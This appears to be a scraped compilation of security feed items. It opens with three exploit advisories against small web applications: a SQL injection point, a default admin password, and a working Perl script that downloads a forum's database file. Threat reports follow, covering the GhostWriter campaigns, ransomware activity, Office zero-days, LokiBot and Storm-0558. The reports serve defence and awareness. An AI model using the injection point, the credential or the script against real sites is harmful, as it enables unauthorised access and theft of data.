BKMobile CMS version 1.5.0 suffers from a remote blind SQL injection vulnerability.

    ====================================================================================================================================| # Title     : BKMobile-CMS V1.5.0 Blind SQL Injection Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://bekustom.com/                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine[+] http://127.0.0.1/BKMobileCMS/user/full_blog_summary.php?blog_id= <=====| inject Her[+] http://127.0.0.1/BKMobileCMS/admin/ = loginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BKMobile CMS 1.5.0 SQL Injection

Blogator Script version 0.93 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 Reinstall default Password Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /bs_auth.php = default pass is admin[+] http://127.0.0.1/courir33net/group33/blog/bs_auth.php = default pass is adminGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator Script 0.93 Insecure Settings

Blackboard version 2.0.2 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : blackboard v 2.0.2 Database Disclosure Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# blackboard v 2.0.2 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('blackboard v 2.0.2 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Blackboard 2.0.2 Database Disclosure

Categories: Business
The test evaluates products against the latest techniques used by data stealers and ransomware.



(Read more...)




The post Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment appeared first on Malwarebytes Labs.

AV-TEST, a leading independent tester of cybersecurity solutions, has just given Malwarebytes two **Advanced** awards **for the ability of our consumer and business products to protect against the latest attack techniques.**

Let’s take a deeper dive into the test and the results.

**Advanced Threat Protection test breakdown**

AV-Test's bi-monthly Advanced Threat Protection exam scrutinizes Windows 11 security products, testing their ability to counter new attack methods.

In the April 2023 trial, they assessed defenses against the "Inline Execute Assembly" technique used by data stealers and ransomware. The test involved 10 malware samples sent via spearphishing emails. If not caught early, data stealers could siphon off data, and ransomware could start encrypting data, while communicating with a C2 server. 

Points were given for detecting key attack phases, with a perfect score being 35 points.

**In the latest results, both Malwarebytes Premium and Malwarebytes Endpoint Protection aced the test, earning the top "Advanced" rating for detecting 10/10 samples and receiving the full 35/35 points.**

Check out the full results: https://www.av-test.org/en/news/advanced-threat-protection-against-the-latest-data-stealers-and-ransomware-techniques/

**Advanced test: Enterprise results**

Malwarebytes Endpoint Protection successfully detected and blocked all ten instances of malware (5 data stealers and 5 ransomware samples) sent via spearphishing emails in the initial two steps—when they first landed on the system and when they attempted to become active—thereby passing all tests in these phases.

******Advanced test: Consumer results**

Malwarebytes Premium fared no differently, having also successfully detected and blocked all ten instances of malware when they first landed on the system and attempted to become active.

**The foundation for superior Endpoint Detection and Response (EDR)**

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it's the bedrock of our Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AV-Test, Malwarebytes EDR constantly monitors endpoint systems and automatically kills processes associated with advanced threat activity. Learn more about our endpoint security solutions.

GET A FREE BUSINESS TRIAL

Learn more about what experts and customers are saying about Malwarebytes:

Malwarebytes recognized as endpoint security leader by G2

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes outperforms competition in latest MRG Effitas assessment

Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment

Cisco Talos has discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. We judge that these operations are very likely aimed at stealing information and gaining persistent remote access.

Thursday, July 13, 2023 06:07

*   Cisco Talos has discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. We judge that these operations are very likely aimed at stealing information and gaining persistent remote access.
*   The activity we analyzed occurred as early as April 2022 and as recently as earlier this month, demonstrating the persistent nature of the threat actor. Ukraine’s Computer Emergency Response Team (CERT-UA) has attributed the July campaign to the threat actor group UNC1151, as a part of the GhostWriter operational activities allegedly linked to the Belarusian government.
*   The attacks used a multistage infection chain initiated with malicious Microsoft Office documents, most commonly using Microsoft Excel and PowerPoint file formats. This was followed by an executable downloader and payload concealed in an image file, likely to make its detection more difficult.
*   The final payloads include the AgentTesla remote access trojan (RAT), Cobalt Strike beacons and njRAT.

**Ukrainian and Polish government and military organizations among those targeted**

Talos first discovered a campaign in late April using several malicious files very likely intended for users in Ukraine, based on the content of the lure displayed when the target opens a malicious Microsoft Excel file. Talos eventually uncovered additional campaigns, including the two previously mentioned by Ukraine’s Computer Emergency Response Team (CERT-UA) and FortiGuard Labs researchers. The campaigns we discovered also involve malicious files intended for users in Poland.

The actor is focusing on Ukrainian and Polish government and military targets, based on the content of Excel and PowerPoint lures that include official-looking images and text. The purpose of these socially engineered lures is to convince the targeted users to enable macros, thereby allowing the execution chain to commence. This is the first stage of the attack, as demonstrated in the timeline below.

Timeline of the various attacks.

Stages of the attack: The lure entices the user to enable macros that infect the system

Of the two file types, the PowerPoint files are more unusual in that they would not show any actual slides when opened, but would still execute the malicious VBA code, a finding consistent with CERT-UA’s analysis. Talos is currently researching whether the file’s failure to open is because they are intentionally corrupted. In any case, the VBA code still runs whenever the files are executed. Based on the files’ thumbnail images – the only content visible in the Windows Explorer window – the PowerPoint files imitate Ukraine’s Ministry of Defence and Poland’s Ministry of National Defence. The image below shows the thumbnail images indicating the campaign’s victims.

Thumbnail images show themes used by PowerPoint lures in these campaigns by the actor.

As opposed to the PowerPoint documents that did not display any slides in our testing environments, all Excel documents display legitimate-looking documents related to the targeted military organizations, or generic descriptions on how to enable VBA macro functionality in Excel. The VBA code in the Excel and PowerPoint-based campaigns displays a high level of similarity. The content of one of the Excel lures is shown below and contains the form for calculating salary payments (cash certificates) for soldiers of a specific military unit.

September 2022 campaign uses a lure that purports to be an official document from the Ukrainian Ministry of Defence.

The actor returned with a new campaign on July 4, 2023. The lure contains a payment instruction form containing VBA code, which appears to have been sent from the State Treasury Service of Ukraine. The content of the form is legitimate and targets Ukrainian government organizations, as seen in the image below. The form also contains legitimate macro code modified by the attacker to call malicious subroutines. It seems that the legitimate macro code is used to calculate some values in the spreadsheets, but the legitimate functions are changed to call the function that starts the infection process.

**Ukrainian and Polish businesses, general users also targeted**

The generic campaigns are aimed at various civilian targets in Poland and Ukraine, such as with Excel spreadsheet lures masquerading as value-added tax (VAT) return forms. Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed. These two lures are shown below, respectively.

April 2023 campaign targeting business users in Poland with a fake VAT return form.

The majority of the Excel campaigns show some element of luring the user to enable macros in Excel with specific content using Ukrainian language.

**Attacks start with VBA code to decode the next malware stage**

All campaigns start with Microsoft Office documents, which are possibly sent to the targets as email attachments. In most cases, the file is an Excel spreadsheet containing a VBA macro, but we also found four instances where a malicious PowerPoint OLE2 (PPT) file was used, possibly indicating the actor's readiness to use file formats less commonly used in attacks.

VBA code is responsible for dropping the downloader executable or DLL.

The VBA code in all files is similar, with minor variations, where some functions serve a legitimate purpose (e.g., some functions for conversion of strings into numbers in Excel). The code is obfuscated, using an obfuscator script, based on the fact that some comments the actor didn’t strip are also obfuscated when the words written in the comments are not recognized as a part of the VBA syntax.

As seen below in the image, the obfuscator randomizes function and variable names but makes the mistake of not recognizing the comments (in green).

Randomized code comments show the code was likely obfuscated by an automated tool.

The code contains the next stage stored as hexadecimal encoded strings and is split into multiple strings so that an antivirus scan would not detect the content as potentially malicious. There are three main subroutines: the first is launched when the document is opened (e.g., Auto\_Open, Workbook\_Open), the second creates a randomly named dynamic loading library (DLL) file in the user’s temporary files folder, and the third creates a randomly named shortcut (LNK) file which contains code to run regsvr32.exe (or rundll32.exe) to launch the next stage.

The name of the shortcut file, depending on the campaign, is either randomly generated by a random string generator function or hardcoded in the macro code. In some campaigns, the random names are generated by a specific function in the VBA code. The screenshot above shows the function that generates a random string of variable length, specified in the function argument.

One subroutine calls the DLL dropper, LNK creation and launch routine.

Earlier campaigns used an executable downloader, while the later ones used DLLs for the next stage.

In some instances, two randomly generated bytes are added to the end of the file, which invalidates the detection of the dropped files using simple checksum-based techniques.

In some cases randomly generated bytes are added to the end of the dropped file.

The July 2023 campaign has a slightly modified infection chain. The dropper first creates a shortcut file but the dropped DLL is launched with rundll32.exe instead of regsvr32.exe. Once the initial export is called (in this case, the legitimately named function IETrackingProtectionEnabled), the downloader will copy itself and call regsvr32.exe with parameters “/u /s” to automatically call the function for unregistering COM servers DllUnregisterServer.

Eventually, when the DLL is copied into its final path, rundll32.exe is used to call the exported function SetQueryNetSessionCount, which downloads the next stage. The final payload of the July 2023 campaign is njRAT, which increases our confidence that the threat actor's goals are information stealing and remote control of the targeted systems. NjRAT is an open-source remote access trojan (RAT) whose source code is freely available and is used by commodity actors and APTs, making the process of attribution more difficult.

July 2023 campaign's main malicious VBA function is Data\_Open.

**Obfuscated downloader retrieves an image containing the payload**

The next stage is a Portable Executable (PE) file, an executable or a DLL file. ConfuserEx obfuscator, an obfuscator that is very commonly used by malicious actors to obfuscate .NET code, is used with various levels of obfuscation, anti-tampering and anti-debugging, which makes the unpacking more difficult for malware researchers. CERT-UA named the downloader PicassoLoader.

All downloaders attempt to download an image file from a URL. Depending on the campaign, the final payload or the third intermediate stage is appended as an encrypted binary blob to the end of the image. The image will still display in viewers but the downloader will extract the executable content using the appropriate decryption key and the decryption algorithm.

The encrypted next-stage blob is appended to the end of a JPEG image.

The downloader uses managed AES (Rijndael algorithm) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly.Load function as seen below. The decryption key and the initialization vector are either stored as obfuscated strings in the body of the downloader or calculated as an MD5 checksum of the downloaded image file.

The downloader first decrypts the third stage and then loads it using the Assembly.Load function.

The code to download the next stage is in constant development. In earlier versions, the call to the Assembly.Load function is fairly easy to spot. In the later campaigns, the actor has chosen to add a layer of obfuscation and use the RuntimeBinder.Binder functionality to find and invoke functions for downloading, decryption and loading.

Later variants of the downloader use Binder to invoke functions.

Earlier variants use RijndaelManaged implementation of AES decryption routine to decrypt the next stage, while the variant from April 2023 uses a simplified variant of RC4 to decrypt the payload appended to an image file. The variant from July 2023 returns to RijndaelManaged.

Managed Rijndael is used to decrypt the third stage.

Simplified RC4 is used to decrypt the third stage in April 2023.

Most of the URLs and the infrastructure were not accessible at the time of analysis, although we managed to obtain images from three campaigns to recreate the infection chain. Our analysis triggered exceptions in the decryption process, so it is possible that the image files we obtained were corrupted or that the implementation of decryption in some of the downloaders was incorrect.

Nevertheless, previous analyses by CERT-UA and FortiGuard Labs indicate that final payloads, which included AgentTesla and Cobalt Strike, were used for information theft and remote access to infected systems.

July 2022 image with the next-stage campaign targeting Ukrainian government organizations.

Payload-carrying image used in September 2022 campaign.

Payload-carrying image used in April 2023 campaign.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**The following ClamAV signatures are applicable to this threat:**

*   Doc.Malware.Corona-10003975-0
*   Win.Downloader.DotNETEncryptedJPEG-10006210-0
*   Win.Downloader.DotNETEncryptedJPEG-10006211-0
*   Win.Downloader.DotNETEncryptedJPEG-10006212-0
*   Win.Downloader.DotNETEncryptedJPEG-10006213-0
*   Win.Downloader.DotNETEncryptedJPEG-10006214-0
*   Win.Downloader.DotNETEncryptedJPEG-10006215-0
*   Win.Downloader.DotNETEncryptedJPEG-10006216-0
*   Win.Downloader.DotNETEncryptedJPEG-10006217-0
*   Win.Downloader.DotNETEncryptedJPEG-10006218-0
*   Win.Downloader.DotNETEncryptedJPEG-10006219-0
*   Win.Downloader.DotNETEncryptedJPEG-10006220-0
*   Win.Downloader.DotNETEncryptedJPEG-10006221-0
*   Win.Downloader.DotNETEncryptedJPEG-10006222-0
*   Img.Dropper.Agent-10006223-0
*   Img.Dropper.Agent-10006224-0
*   Xls.Dropper.Corona-10006204-0
*   Xls.Dropper.Corona-10006205-1
*   Xls.Dropper.Corona-10006207-0
*   Xls.Dropper.Corona-10006205-1
*   Ole2.Dropper.Corona-10006206-1
*   Xls.Dropper.Corona-10006207-1
*   Ole2.Dropper.Corona-10006209-0
*   Win.Trojan.Generic-6417450-0

**Indicators of Compromise (IOC)**

Indicators of Compromise associated with these threats can be found here.

Malicious campaigns target government, military and civilian entities in Ukraine, Poland

Categories: Threat Intelligence
Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. 



(Read more...)




The post Ransomware review: July 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. The group's 91 attacks come not long after their extensive GoAnywhere campaign in March, when they hit over 100 organizations using a nasty zero-day.

June also witnessed a staggering increase in attacks from relatively new gangs such as Akira (26) and 8Base (41), enough to propel both of them into the top five—a designation usually reserved for more familiar names like ALPHV, who was conspicuously silent in June. 

Other big stories in June include a suspected LockBit affiliate arrest, the Royal ransomware gang toying with a new encryptor, and a notable increase in attacks on the Manufacturing sector.

  

Known ransomware attacks by gang, June 2023

Comparing June to the earlier months of the year, we notice several shifts in ransomware activity. There was a massive decrease in the activity from Royal, for example, which normally dominates the monthly rankings—often cracking into the top five—with an average of roughly 30 attacks a month in that period. But last month, they posted just two victims. 

While a sudden dip in attacks isn't too unusual for top ransomware gangs, it's worth mentioning that in last month’s review we speculated that Royal might be going through a rebrand. That's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware.

Considering that both Royal and BlackSuit were active last month, however, a rebrand probably isn’t happening any time soon. Instead, it’s likely that Royal is simply testing a new encryptor—especially considering that BlackSuit was used in just two attacks last month—and that this lull can be explained as more or less of a research period for them.

Other interesting anomalies in June include 47 attacks on the Manufacturing industry (which usually averages around 20 attacks a month) and notable increases in attacks on Switzerland (14) and Brazil (13), both of which are normally attacked only two or three times a month. Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month, while PLAY focused on Switzerland (5).

Known ransomware attacks by country, June 2023

Known ransomware attacks by industry sector, June 2023

Cl0p's precipitous rise to the top of the charts this month, on the other hand, can be explained by their exploitation of a zero-day in MOVEit Transfer, a widely used file transfer software.

The vulnerability, which could allow attackers to gain escalated privileges and unauthorized access to an environment, was first disclosed on May 31st in a security bulletin released by Progress. But while it was clear earlier on that attackers were actively exploiting CVE-2023-34362, it was only a few days later that it became clear that Cl0p was behind the attacks. A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend. What’s more, two other vulnerabilities in MOVEit were found while new victims were still coming forward.

In terms of the fallout, it’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero-day.

The MOVEit data breaches had widespread impacts, affecting everything from the Oregon DMV and Louisiana OMV (Office of Motor Vehicles)—including the leak of nearly 10 million drivers' licenses—to the University of Rochester and multiple corporations. PBI Research Services also reported a data breach that exposed information for 4.75 million people. The government even offered a reward of up to $10 million for information on Cl0p after several federal agencies in the US fell victim to the gang.

**LockBit **

LockBit reportedly squeezed about $91 million out of US organizations with around 1,700 attacks since 2020, according to a June report by CISA. As confirmed by our own research data, CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022.

As for who was hit the hardest, around 16 percent of ransomware incidents affecting State, Local, Tribal, and Tribunal (SLTT) governments were from LockBit, says the MS-ISAC.

In other news, a suspected LockBit affiliate named Ruslan Magomedovich Astamirov, a 20-year-old from the Chechen Republic, was arrested in Arizona last month. The US Justice Department thinks he's been deploying LockBit ransomware on victim networks both in the States and overseas, with the investigation having run from August 2020 through March 2023.

Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers, plus he's accused of making ransom demands through deploying ransomware. The arrest makes him the third LockBit affiliate charged in the US since November.

**Newcomers****NoEscape**

NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023. Developed in-house using C++, the NoEscape ransomware uses a hybrid approach to encryption, combining ChaCha20 and RSA encryption algorithms for file encryption and key protection.

Last month, NoEscape posted 7 victims on their leak site.

**Darkrace**

DarkRace is a new ransomware group first discovered by researcher S!Ri. Darkrace specifically targets Windows operating systems and has several similarities to LockBit.

The gang attacked 10 victims last month, the majority of them being from the Information and Communications Technology (ICT) sectors. Geographically, most victims are located in Europe, specifically Italy. 

**Rhysida**

Rhysida, a new ransomware gang claiming to be a "cybersecurity team," has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army. 

The gang published a whopping eighteen victims on their leak site in June, making it one of the most prolific newcomers in our month reviews to-date.

Ransomware review: July 2023

Categories: Business
Tags: microsoft

Tags:  zero-day

Tags:  exploit

Tags:  CVE-2023-36884

Tags:  storm-0978

Tags:  email

Tags:  phish

Tags:  phishing

Tags:  Ukraine

We take a look at reports of an exploit being deployed via booby trapped Word documents.



(Read more...)




The post Zero-day deploys remote code execution vulnerability via Word documents appeared first on Malwarebytes Labs.

An unpatched zero-day vulnerability is currently being abused in the wild, targeting those with an interest in Ukraine. Microsoft reports that CVE-2023-36884 is tied to reports of:

> …a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents. An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

While the CVE is being updated with new information and links to appropriate security information, the Microsoft Security Blog is currently exploring the issue in detail.

This all ties back to a phishing campaign operated by a group being tracked as “Storm-0978” which targets defence and government entities in both Europe and North America. The campaign itself makes use of bait related to the Ukrainian World Congress, a non-profit organisation of “all Ukrainian public organisations in diaspora”.

These infections originate from remote code execution via Word documents exploiting the above Ukraine-themed bait, as well as an “abuse of vulnerabilities contributing to a security feature bypass”. A fake OneDrive loader delivers a backdoor with similarities to RomCom, their primary backdoor tool. It's unusual to observe websites involved in this kind of attack still be online hours after a reveal, but here are some shots we took of both site and downloads (thanks to Jerome):

Some of the other attacks launched by this group involve distribution of trojanized versions of popular software. Once the backdoor has taken hold, the group “may steal credentials to be used in targeted operations”.

Popular tools used for these installations include trojanized versions of Solarwinds Network Performance Monitor, KeePass, Signal, and Adobe products. Bogus domains imitating the real thing are registered and used as convincing fronts for the infected software.

Microsoft notes that this group also has a hand in ransomware attacks, though it is less targeted in nature and unrelated to any espionage-themed operations. Attacks which have been identified as belonging to Storm-0978 in this realm have impacted finance and telecommunications industries.

A variety of attacks on several fronts, then. 

Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks:

**CVE-2023-36884 specific recommendations**

*   Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884.
*   In current attack chains, the use of the Block all Office applications from creating child processes attack surface reduction rule prevents the vulnerability from being exploited
*   Organizations who cannot take advantage of these protections can set the FEATURE\_BLOCK\_CROSS\_PROTOCOL\_FILE\_NAVIGATION registry key to avoid exploitation.  Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications.

You could also consider blocking outbound SMB traffic.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Zero-day deploys remote code execution vulnerability via Word documents

The Syncfusion EJ2 Node File Provider 0102271 is vulnerable to filesystem-server.js directory traversal. As a result, an unauthenticated attacker can: - On Windows, list files in any directory, read any file, delete any file, upload any file to any directory accessible by the web server. - On Linux, read any file, download any directory, delete any file, upload any file to any directory accessible by the web server.

CVE-2023-26563: File system provider in EJ2 TypeScript File manager control

By Waqas
LokiBot, a notorious Trojan active since 2015, specializes in stealing sensitive information from Windows machines, posing a significant threat to user data.
This is a post from HackRead.com Read the original post: New Attack Drops LokiBot Malware Via Malicious Macros in Word Docs

**The malware campaign, exploiting two known vulnerabilities including Follina, has been discovered by cybersecurity researchers at FortiGuard Labs.**

FortiGuard Labs recently uncovered a concerning discovery in their investigation, revealing a series of malicious Microsoft Office documents designed to take advantage of well-known vulnerabilities.

These documents exploit remote code execution vulnerabilities, namely **CVE-2021-40444** and **CVE-2022-30190** (Follina), to inject LokiBot (aka Loki PWS) malware onto victims’ systems.

**LokiBot**, a notorious Trojan active since 2015, specializes in stealing sensitive information from Windows machines, posing a significant threat to user data.

It all started when FortiGuard Labs obtained and analyzed two distinct types of Word documents, both posing severe threats to unsuspecting victims. The first type incorporated an external link embedded within an XML file named “word/\_rels/document.xml.rels.”

Meanwhile, the second type employed a VBA script that executed a **malicious macro** upon opening the document. Interestingly, both files contained a visually similar bait image, shown in Figure 1, indicating a potential connection between the attacks.

The Word document leveraging CVE-2021-40444 contained a file named “document.xml.rels,” which hosted an external link employing MHTML (MIME Encapsulation of Aggregate HTML documents). This link employed Cuttly, a URL shortener and link management platform, to redirect users to a cloud file-sharing website called “GoFile.”

Further analysis revealed that accessing the link initiated the download of a file named “defrt.html,” exploiting the second vulnerability, CVE-2022-30190. Once the payload is executed, it triggers the download of an injector file labelled “oehrjd.exe” from the URL “http//pcwizardnet/yz/ftp/.”

The second document, discovered towards the end of May 2023 featured a VBA script embedded within the Word file. The script, utilizing the “Auto\_Open” and “Document\_Open” functions, automatically executed upon opening the document. It decoded various arrays, saving them as a temporary folder under the name “DD.inf.”

Notably, the script created an “ema.tmp” file to store data, encoding it using the “ecodehex” function, and saving it as “des.jpg.” Subsequently, the script employed rundll32 to load a DLL file containing the “maintst” function. Throughout this process, all temporary, JPG, and INF files created were systematically deleted.

Regarding the VBA script’s INF file creation, the purpose was to load a DLL file named “des.jpg,” responsible for downloading an injector from the URL “https//vertebromedmd/temp/dhssdfexe” for use in later stages.

The web page and the compromised folder used in the scam (left) – The actual screenshot from the malicious Word document (right) – Image credit: Fortinet Labs

It is worth noting that the download link deviates from the typical file-sharing cloud platform or the attacker’s command-and-control (C2) server. Instead, it leverages the website “vertebromed.md,” an active domain since 2018.

Additionally, within the same folder, FortiGuard Labs uncovered another MSIL loader named “IMG\_3360\_103pdf.exe,” created on May 30, 2023. Although not directly involved in the Word document attack chain, this file also loads LokiBot and connects to the same C2 IP.

For in-depth technical details on the return of LokiBot malware visit Fortinet’s blog post **here**.

LokiBot, a persistent and widespread malware, has continued to evolve over the years, adapting its initial access methods to propagate and infect systems more efficiently. By exploiting a range of vulnerabilities and leveraging VBA macros, LokiBot remains a significant concern for cybersecurity. The utilization of a VB injector further enables evasion techniques that circumvent detection and analysis, intensifying the threat it poses to users.

To safeguard themselves from such threats, users are urged to exercise caution when dealing with Office documents or unknown files, particularly those containing links to external websites. Vigilance is crucial, and it is vital to avoid clicking on suspicious links or opening attachments from untrusted sources. Keeping software and operating systems up to date with the latest security patches can also help mitigate the risk of falling victim to malware exploitation.

As cybercriminals continue to refine their tactics, staying informed and adopting strong security measures is essential for individuals and organizations to protect sensitive data from the relentless onslaught of sophisticated attacks.

**RELATED ARTICLES**

1.  LokiBot and NanoCore malware distributed in ISO image files
2.  Drake’s kiki do you love me exploited to drop Lokibot malware
3.  TrickGate: Malicious Software Outwitting Antivirus for 6 Years
4.  New LokiBot malware variant dropped as Epic Games installer

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New Attack Drops LokiBot Malware Via Malicious Macros in Word Docs

By Waqas
Microsoft has exposed and halted an intrusion campaign by a China-based threat actor, Storm-0558.
This is a post from HackRead.com Read the original post: Chinese Group Storm-0558 Hacked European Govt Emails, Microsoft

Microsoft has recently uncovered a sophisticated intrusion campaign carried out by a China-based threat actor, identified as Storm-0558. This campaign successfully gained access to email accounts, impacting approximately 25 organizations, including government agencies, and potentially compromising related consumer accounts.

**Sophisticated Threat Actors Targeting IT Systems**

As cyberattacks grow increasingly sophisticated and frequent, motivated threat actors spare no effort in compromising IT systems. These well-resourced adversaries, such as Storm-0558, show no distinction between targeting business or personal accounts associated with their intended organizations.

Storm-0558, identified as an espionage-motivated adversary based in China, primarily focuses on gaining access to email systems for intelligence collection, abusing credentials to access data in sensitive systems.

**Mitigation Efforts and Investigation Timeline**

Microsoft’s proactive investigation commenced on June 16, 2023, following reports of anomalous mail activity from customers. Over the course of a few weeks, the investigation revealed that Storm-0558 had gained unauthorized access to email data from approximately 25 organizations.

The threat actor infiltrated both organisational and associated consumer accounts using forged authentication tokens and an acquired Microsoft account (MSA) consumer signing key. However, Microsoft has successfully completed the mitigation process for all affected customers, and no further access has been detected.

**Coordinated Response and Collaborative Efforts**

Microsoft’s real-time investigation, combined with its collaboration with impacted customers, proved crucial in swiftly applying protections within the Microsoft Cloud to defend against Storm-0558’s intrusion attempts.

The company promptly contacted affected customers, providing support and guidance throughout the incident. Recognizing the gravity of the situation, Microsoft has also partnered with relevant government agencies, including the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (DHS CISA), to ensure a coordinated response and enhance overall cybersecurity resilience.

In a comment to Hackread.com, Shobhit Gautam, Solutions Architect, EMEA at HackerOne said that “Storm-0558, speculated to be a state-sponsored actor, is also known to use custom malware such as Cigril and Bling for the purpose of espionage.”

“Exploiting vulnerabilities in the supplier network has become a key tactic in the attacker’s playbook and The best way to identify complex vulnerability risk is to take an outsider’s mindset that looks at how an attacker might make use of a variety of weaknesses to chain together to have a far more powerful impact,” Gautam warned.

**Takeaway**

The evolving cyber threat landscape constantly poses challenges, particularly with speculated state-sponsored actors like Storm-0558 actively exploiting vulnerabilities in IT systems. Adding to the growing concerns, recent weeks have witnessed two additional reports of sophisticated malicious activities originating from China.

On June 23rd, researchers from Check Point reported a targeted campaign by the Chinese APT group Mustang Panda, also known as Camaro Dragon, involving espionage malware. The campaign specifically targeted the European healthcare sector through the use of USB drives.

Continuing their investigation, Check Point published another report on July 5th, highlighting the escalating interest of Chinese threat actors in targeting European governments, embassies, and entities involved in foreign policy-making. Mustang Panda once again emerged as the group behind the campaign, utilizing a previously unseen malware dubbed SmugX.

Nevertheless, this incident serves as a harsh reminder for organizations to remain vigilant and implement robust security measures to safeguard against sophisticated threats in an ever-evolving digital world.

**RELATED ARTICLES**

1.  Chinese Hackers Hiding Malware in Windows Logo
2.  Backdoor into FortiOS: Chinese Threat Actors Utilize 0-Day
